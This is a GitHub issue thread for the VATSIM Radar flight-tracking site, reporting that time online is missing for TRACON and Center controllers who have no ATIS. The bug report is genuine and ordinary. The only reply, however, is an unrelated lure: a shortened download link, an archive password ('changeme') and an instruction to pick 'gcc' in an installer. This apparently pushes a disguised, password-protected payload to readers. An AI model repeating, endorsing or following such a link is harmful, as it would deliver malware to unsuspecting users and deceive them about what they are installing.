### ISSUE TITLE
Time Online not displayed when TRACON/Center ATIS is empty

### ISSUE THREAD

**Issue by Giantpickle314** [VATSIM-Radar/vatsim-radar#305]
### Your Vatsim CID

1545737

### Radar version

v0.4.4-beta.4

### Describe your issue

When a controller on a TRACON or Center position does not have a controller ATIS advertised, the time online is not displayed. This does not appear to affect the Tower/Ground/Delivery positions.
Images: No ATIS (Next), with ATIS (Next), no ATIS (Prod)
![image](https://github.com/user-attachments/assets/d742088d-4d85-4fbc-93d6-4d8bdb93451b)
![image](https://github.com/user-attachments/assets/742002d0-bc46-4265-8aa8-5cc2603e6231)
![image](https://github.com/user-attachments/assets/f62bc1cf-f381-4dfe-8db0-395cdf7b0c1d)

### Reproduction steps

A TRACON or Center controller with no controller ATIS. Specifically noted for SJU_1_APP, SJU_2_CTR, SJC_M_APP, and MCO_E_APP.

### Platform

Windows 11, Vivaldi 6.8.3381.57 (Stable channel) (64-bit) 

### Validation

- [X] I have searched for other issues and didn't found any alike
- [x] I have also checked roadmap, and this is not planned
- [X] I am QA or Patreon member and using next.vatsim-radar.com
- [X] I couldn't reproduce it on production / it's issue in new functionality

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
